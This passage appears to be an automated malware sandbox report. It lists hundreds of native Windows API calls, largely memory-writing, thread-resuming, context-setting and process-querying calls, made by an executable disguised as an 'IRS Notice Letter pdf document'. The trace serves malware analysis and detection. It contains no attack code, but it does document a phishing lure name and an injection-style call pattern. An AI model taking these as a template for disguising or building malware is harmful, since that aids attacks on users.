      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9081 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D90BD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D90BA NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D90A9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D90D5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D90C9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D90FD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D90F1 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D90E5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8119 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9115 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D5111 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D912D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9121 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9159 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D914D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9141 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9175 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9172 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D919C NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D918D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9181 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D91AD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3605 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9604 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D365E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3648 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D36A6 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3705 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3722 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3759 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D374D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3765 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3795 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D37BE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D37D2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D37E5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9415 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9409 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9435 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9429 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D1451 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9441 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9491 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94BD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34B4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94B1 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94A5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94D9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34D1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94CD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34FD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94F9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34FA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94F6 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94E5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3515 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9511 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3509 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9505 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D953E NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D952D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D955E NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3559 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D354D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D354A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9579 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D956D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3565 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9561 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9598 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35BD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95B5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35AC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95A9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95D5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35C9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95C9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95C6 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35F9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35ED NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95E1 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8A1C NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0A15 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0A09 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3A36 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3A25 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8A25 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3A95 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AAD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AA1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AD4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AF1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AE5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3B1D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3B14 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D7B3A NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3B35 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3B29 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3819 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D382A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3879 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3868 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3885 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D38BC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D38D9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D38CD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D08F5 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D393D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D093E NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3931 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D092D NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D392E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3949 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D397C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0975 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3999 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D098D NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D398D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0981 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8982 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D39D9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D09D9 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D39CD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D89FC NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D39E5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D1E10 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D1E57 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FCD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FF9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FED NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FE1 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2795D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2799A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2796D0 NtCreateKey,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E27A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279760 NtOpenProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E27A770 NtOpenThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E27AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279560 NtWriteFile,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2795F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279A10 NtQuerySection,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E27A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E27B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2798A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E279950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2799D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568FAC NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569055 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569040 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569049 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569075 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569061 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569069 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569010 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569019 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569031 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569025 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005690D5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005690C9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005690F1 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005690FD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005690E5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569091 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056909D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569081 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005690BD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005690BA NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005690A9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569159 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569141 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056914D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569175 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569172 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569115 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569121 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056912D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005689FC NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056919C NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568982 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569181 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056918D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005691AD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569254 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569241 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056926A NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568A1C NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569209 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569235 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569226 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568A25 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569229 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005692D5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005692DD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005692C9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005692F5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005692E9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569295 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569289 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005692B4 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005692BD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005692A1 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569356 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569345 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056936E NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569311 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056931D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569305 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569334 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005693DD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005693F4 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005693FD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569398 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569381 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005693A9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569441 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569415 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569409 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569435 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569429 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005694D9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005694CD NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005694F6 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005694F9 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005694E5 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00569491 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005694B1 NtQueryInformationProcess,
